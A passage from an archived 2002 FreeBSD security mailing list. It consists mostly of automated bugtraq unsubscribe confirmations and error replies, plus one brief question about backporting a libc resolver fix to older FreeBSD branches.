03:40:08 -0000 Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> From: root@mail.securityfocus.com Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:52: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D464837B405 for ; Fri, 28 Jun 2002 20:52:00 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 2F22843E5E for ; Fri, 28 Jun 2002 20:50:12 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 19303 invoked by alias); 29 Jun 2002 03:41:45 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 03:41:45 -0000 Message-ID: <1025322105.19302.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Reply-To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Subject: confirm unsubscribe from bugtraq@securityfocus.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. To confirm that you would like security@freebsd.org removed from the bugtraq mailing list, please send an empty reply to this address: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary@xdd.ff.com receives messages with return path: -mary=xdd.ff.com@securityfocus.com. Some mail programs are broken and cannot handle long addresses. If you cannot reply to this request, instead send a message to and put the entire address listed above into the "Subject:" line. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 Date: 29 Jun 2002 03:40:36 -0000 Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> From: root@mail.securityfocus.com Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 20:56:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7AE7037B400 for ; Fri, 28 Jun 2002 20:56:51 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 7CA8C43E3B for ; Fri, 28 Jun 2002 20:55:19 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 20664 invoked by alias); 29 Jun 2002 03:47:46 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 03:47:46 -0000 Message-ID: <1025322466.20663.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 20658 invoked from network); 29 Jun 2002 03:47:46 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:47:46 -0000 Received: (qmail 10822 invoked by alias); 29 Jun 2002 03:43:04 -0000 Received: (qmail 10759 invoked from network); 29 Jun 2002 03:42:45 -0000 Received: from dsl-64-192-134-253.telocity.com (HELO freebsd.org) (64.192.134.253) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:42:45 -0000 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 20658 invoked from network); 29 Jun 2002 03:47:46 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 03:47:46 -0000 Received: (qmail 10822 invoked by alias); 29 Jun 2002 03:43:04 -0000 Date: 29 Jun 2002 03:43:04 -0000 Message-ID: <20020629034304.10821.qmail@securityfocus.com> Received: (qmail 10759 invoked from network); 29 Jun 2002 03:42:45 -0000 Received: from dsl-64-192-134-253.telocity.com (HELO freebsd.org) (64.192.134.253) by mail.securityfocus.com with SMTP; 29 Jun 2002 03:42:45 -0000 From: freebsd-security@freebsd.org To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Subject: unsubscribe blank reply To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 21: 8:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4401F37B400 for ; Fri, 28 Jun 2002 21:08:20 -0700 (PDT) Received: from castle.jp.FreeBSD.org (castle.jp.FreeBSD.org [210.226.20.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C7CD43E0A for ; Fri, 28 Jun 2002 21:08:19 -0700 (PDT) (envelope-from matusita@jp.FreeBSD.org) Received: from localhost (localhost [::1]) by castle.jp.FreeBSD.org (8.11.6+3.4W/8.11.3) with ESMTP/inet6 id g5T48Hn48826 for ; Sat, 29 Jun 2002 13:08:17 +0900 (JST) (envelope-from matusita@jp.FreeBSD.org) X-User-Agent: Mew/1.94.2 XEmacs/21.5 (bamboo) X-FaceAnim: (-O_O-)(O_O- )(_O- )(O- )(- -)( -O)( -O_)( -O_O)(-O_O-) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Dispatcher: imput version 20000228(IM140) Lines: 10 From: Makoto Matsushita To: security@FreeBSD.org Subject: libc resolver fix: can we applied to 3-stable or before? Date: Sat, 29 Jun 2002 13:06:07 +0900 Message-Id: <20020629130607U.matusita@jp.FreeBSD.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Simple question: Is our 3-stable libc vulnerable? If so, can we apply the same patch to RELENG_3 also? If 3-stable libc is vulnerable, our compat3x/libc.so.3.uu bundled with 4-stable (and 5-stable in the future) is also vulnerable, and it would be good to fix. Note that same stories are also applied to libc of 2.2-stable or before. -- - Makoto `MAR' Matsushita To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 21:41:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4592E37B400 for ; Fri, 28 Jun 2002 21:41:08 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 69CD143E0A for ; Fri, 28 Jun 2002 21:41:07 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 4293 invoked by alias); 29 Jun 2002 04:40:24 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 04:40:24 -0000 Message-ID: <1025325624.4292.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 4287 invoked from network); 29 Jun 2002 04:40:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 04:40:24 -0000 Received: (qmail 30473 invoked by alias); 29 Jun 2002 04:35:42 -0000 Received: (qmail 30464 invoked from network); 29 Jun 2002 04:35:41 -0000 Received: from hex.csh.rit.edu (HELO hex.databits.net) (129.21.60.134) by mail.securityfocus.com with SMTP; 29 Jun 2002 04:35:41 -0000 Received: by hex.databits.net (Postfix, from userid 1001) id 2232220F5E; Sat, 29 Jun 2002 00:41:04 -0400 (EDT) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 4287 invoked from network); 29 Jun 2002 04:40:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 04:40:24 -0000 Received: (qmail 30473 invoked by alias); 29 Jun 2002 04:35:42 -0000 Received: (qmail 30464 invoked from network); 29 Jun 2002 04:35:41 -0000 Received: from hex.csh.rit.edu (HELO hex.databits.net) (129.21.60.134) by mail.securityfocus.com with SMTP; 29 Jun 2002 04:35:41 -0000 Received: by hex.databits.net (Postfix, from userid 1001) id 2232220F5E; Sat, 29 Jun 2002 00:41:04 -0400 (EDT) Date: Sat, 29 Jun 2002 00:41:04 -0400 From: Pete Fritchman To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020629004104.A90398@absolutbsd.org> References: <1025322076.19222.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com>; from bugtraq-help@securityfocus.com on Sat, Jun 29, 2002 at 03:41:16AM -0000 ++ 29/06/02 03:41 -0000 - bugtraq-help@securityfocus.com: | Hi! This is the ezmlm program. I'm managing the | bugtraq@securityfocus.com mailing list. | | I'm working for my owner, who can be reached | at bugtraq-owner@securityfocus.com. | | To confirm that you would like | | freebsd-security@freebsd.org | | removed from the bugtraq mailing list, please send an empty reply | to this address: | | bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com | | Usually, this happens when you just hit the "reply" button. | If this does not work, simply copy the address and paste it into | the "To:" field of a new message. | | I haven't checked whether your address is currently on the mailing list. | To see what address you used to subscribe, look at the messages you are | receiving from the mailing list. Each message has your address hidden | inside its return path; for example, mary@xdd.ff.com receives messages | with return path: -mary=xdd.ff.com@securityfocus.com. | | Some mail programs are broken and cannot handle long addresses. If you | cannot reply to this request, instead send a message to | and put the entire address listed above | into the "Subject:" line. | | | --- Administrative commands for the bugtraq list --- | | I can handle administrative requests automatically. Please | do not send them to the list address! Instead, send | your message to the correct command address: | | For help and a description of available commands, send a message to: | | | To subscribe to the list, send a message to: | | | To remove your address from the list, just send a message to | the address in the ``List-Unsubscribe'' header of any list | message. If you haven't changed addresses since subscribing, | you can also send a message to: | | | or for the digest to: | | | For addition or removal of addresses, I'll send a confirmation | message to that address. When you receive it, simply reply to it | to complete the transaction. | | If you need to get in touch with the human owner of this list, | please send a message to: | | | | Please include a FORWARDED list message with ALL HEADERS intact | to make it easier to help you. | | --- Enclosed is a copy of the request I received. | | Return-Path: | Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 | Received: from unknown (HELO securityfocus.com) (66.38.151.9) | by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 | Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 | Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 | Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) | by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 | Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 | Date: 29 Jun 2002 03:40:08 -0000 | Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> | From: root@mail.securityfocus.com | Content-Type: text/plain | Content-Disposition: inline | Content-Transfer-Encoding: binary | MIME-Version: 1.0 | X-Mailer: MIME-tools 5.411 (Entity 5.404) | To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- Pete Fritchman [petef@(databits.net|freebsd.org|wyom.net)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 21:41:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4476637B401 for ; Fri, 28 Jun 2002 21:41:12 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 8C69743E09 for ; Fri, 28 Jun 2002 21:41:10 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 4324 invoked by alias); 29 Jun 2002 04:40:28 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 04:40:28 -0000 Message-ID: <1025325628.4323.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 4318 invoked from network); 29 Jun 2002 04:40:28 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 04:40:28 -0000 Received: (qmail 30502 invoked by alias); 29 Jun 2002 04:35:46 -0000 Received: (qmail 30492 invoked from network); 29 Jun 2002 04:35:46 -0000 Received: from hex.csh.rit.edu (HELO hex.databits.net) (129.21.60.134) by mail.securityfocus.com with SMTP; 29 Jun 2002 04:35:46 -0000 Received: by hex.databits.net (Postfix, from userid 1001) id 864A020F61; Sat, 29 Jun 2002 00:41:09 -0400 (EDT) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 4318 invoked from network); 29 Jun 2002 04:40:28 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 04:40:28 -0000 Received: (qmail 30502 invoked by alias); 29 Jun 2002 04:35:46 -0000 Received: (qmail 30492 invoked from network); 29 Jun 2002 04:35:46 -0000 Received: from hex.csh.rit.edu (HELO hex.databits.net) (129.21.60.134) by mail.securityfocus.com with SMTP; 29 Jun 2002 04:35:46 -0000 Received: by hex.databits.net (Postfix, from userid 1001) id 864A020F61; Sat, 29 Jun 2002 00:41:09 -0400 (EDT) Date: Sat, 29 Jun 2002 00:41:09 -0400 From: Pete Fritchman To: bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020629004109.B90398@absolutbsd.org> References: <1025322105.19302.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <1025322105.19302.ezmlm@securityfocus.com>; from bugtraq-help@securityfocus.com on Sat, Jun 29, 2002 at 03:41:45AM -0000 ++ 29/06/02 03:41 -0000 - bugtraq-help@securityfocus.com: | Hi! This is the ezmlm program. I'm managing the | bugtraq@securityfocus.com mailing list. | | I'm working for my owner, who can be reached | at bugtraq-owner@securityfocus.com. | | To confirm that you would like | | security@freebsd.org | | removed from the bugtraq mailing list, please send an empty reply | to this address: | | bugtraq-uc.1025322105.anappojclppmkdgakbfc-security=freebsd.org@securityfocus.com | | Usually, this happens when you just hit the "reply" button. | If this does not work, simply copy the address and paste it into | the "To:" field of a new message. | | I haven't checked whether your address is currently on the mailing list. | To see what address you used to subscribe, look at the messages you are | receiving from the mailing list. Each message has your address hidden | inside its return path; for example, mary@xdd.ff.com receives messages | with return path: -mary=xdd.ff.com@securityfocus.com. | | Some mail programs are broken and cannot handle long addresses. If you | cannot reply to this request, instead send a message to | and put the entire address listed above | into the "Subject:" line. | | | --- Administrative commands for the bugtraq list --- | | I can handle administrative requests automatically. Please | do not send them to the list address! Instead, send | your message to the correct command address: | | For help and a description of available commands, send a message to: | | | To subscribe to the list, send a message to: | | | To remove your address from the list, just send a message to | the address in the ``List-Unsubscribe'' header of any list | message. If you haven't changed addresses since subscribing, | you can also send a message to: | | | or for the digest to: | | | For addition or removal of addresses, I'll send a confirmation | message to that address. When you receive it, simply reply to it | to complete the transaction. | | If you need to get in touch with the human owner of this list, | please send a message to: | | | | Please include a FORWARDED list message with ALL HEADERS intact | to make it easier to help you. | | --- Enclosed is a copy of the request I received. | | Return-Path: | Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 | Received: from unknown (HELO securityfocus.com) (66.38.151.9) | by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 | Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 | Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 | Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) | by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 | Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 | Date: 29 Jun 2002 03:40:36 -0000 | Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> | From: root@mail.securityfocus.com | Content-Type: text/plain | Content-Disposition: inline | Content-Transfer-Encoding: binary | MIME-Version: 1.0 | X-Mailer: MIME-tools 5.411 (Entity 5.404) | To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- Pete Fritchman [petef@(databits.net|freebsd.org|wyom.net)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 22:58:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F33C837B401 for ; Fri, 28 Jun 2002 22:58:31 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 4C9C543E13 for ; Fri, 28 Jun 2002 22:58:31 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 12469 invoked by alias); 29 Jun 2002 05:57:48 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 05:57:48 -0000 Message-ID: <1025330268.12468.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 12463 invoked from network); 29 Jun 2002 05:57:48 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 05:57:48 -0000 Received: (qmail 14575 invoked by alias); 29 Jun 2002 05:52:57 -0000 Received: (qmail 14400 invoked from network); 29 Jun 2002 05:52:55 -0000 Received: from sugar.makintosh.com (209.15.204.209) by mail.securityfocus.com with SMTP; 29 Jun 2002 05:52:55 -0000 Received: by sugar.maKintosh.com (Postfix, from userid 1000) id 87AEF1D06A; Sat, 29 Jun 2002 00:58:18 -0500 (CDT) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 12463 invoked from network); 29 Jun 2002 05:57:48 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 05:57:48 -0000 Received: (qmail 14575 invoked by alias); 29 Jun 2002 05:52:57 -0000 Received: (qmail 14400 invoked from network); 29 Jun 2002 05:52:55 -0000 Received: from sugar.makintosh.com (209.15.204.209) by mail.securityfocus.com with SMTP; 29 Jun 2002 05:52:55 -0000 Received: by sugar.maKintosh.com (Postfix, from userid 1000) id 87AEF1D06A; Sat, 29 Jun 2002 00:58:18 -0500 (CDT) Date: Sat, 29 Jun 2002 00:58:18 -0500 From: John Kerbawy To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020629055818.GA13845@maKintosh.com> References: <1025322076.19222.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com> User-Agent: Mutt/1.4i To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 23:27:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from 